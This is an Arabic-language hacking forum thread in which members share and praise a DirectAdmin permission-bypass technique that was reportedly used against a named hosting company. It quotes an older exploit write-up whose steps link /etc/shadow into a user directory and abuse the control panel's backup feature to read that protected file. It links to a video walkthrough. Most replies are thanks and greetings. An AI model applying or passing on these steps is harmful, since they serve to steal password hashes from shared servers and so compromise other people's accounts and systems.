DirectAdmin 1.36.2 Symlink Permission Bypass

[b]السلام عليكم

بمناسبة عضوية vip :wink:

حبيت اعمل شرح بسيط تخطى الحماية والفوربيدن فى

Directadmin

التطبيق على استضافة و يستى المشهورة eek

الشرح مهدى للجميع . ddd

http://www.multiupload.com/59D7VZCHBH
[/b]

merci 3elik Br0X

مشكور على المرور اخى jago-dz

شفت شرحك يا بروكس لاكن أضن أن الطريقة نزلت في السكيورتي وار من طرف النجم 33

من أيام زمان نفس الطريقة فقط تغيير بسيط

ليس إعتراض لشرحك الجميل فقط ملاحظة …

نعم عندك حق وكان ذلك فى الاصدار 1.33.6

وهدا تطبيق فى الاصدار الجديد فقط

هدا للاخ نجم http://www.exploit-db.com/exploits/11029/

tar.gz file مشكل لازم تضفط بامتدا zip لفك الضغط

كلامك صحيح كنت بدور علي الثغرة في مواقع السكيورتي لقيتك طرحتهاا
ادن عادت الثغرة من جديد

subject: Directadmin <= 1.33.6 symlink permission bypassdate: 5/1/21010
author: Alnjm33
tested on: 1.33.6 – 1.33.1 and i think it’s work in all versions
home:sec-war.com
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::exploit::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
First
must execute this command on the server >>>> ln /etc/shadow
to make symbolic link to shadow file in any dir
after that go to
create/restore backups in direct and make
((domains directory: Backs up))
the backup file will be in
/home/test/backups
go there then extract tar.gz file
after extract
go to
/home/test/backups/domains/test.com/public_html
or the dir which you execute the command
and now you can read the shadow file which have 400 permission

greetz to :predator -sh0ot3r - xxx - mu$l!m-h4ck3r - ahmadso -jamba-root_egy-jago-dz-xr57 all sec-war.com members<http://sec-war.com/cc//index.php?showuser=36&gt;

شكرا ليك اخي على الطرح … بالتوفيق

ولكن اضن انه يجب دكر الحقوق … كل الحقوق للاخ النجم 33 وليك صاحب الشرح ايضا

ههه اهلا كاكاشى وضعت شرح فيديوا للاستفادة فقط

ههه هاذا الرد نتاعك p2t( بدون تحلاب) ddd

مشكور على المرور اخى

جميل جدا خويا بروكس شرح قمة و مستاهل موضوع فيب.

بارك لله فيك خويا brox على الشرح اكيد الكل يستفيد خصوصاً شغال على ويستي

نورت الموضوع بمرورك اخ نسيم

مشكور حبيبي Ma3sTr0-Dz

بعيد عن الموضوع (منور القسم حياك الله )

الله يحييك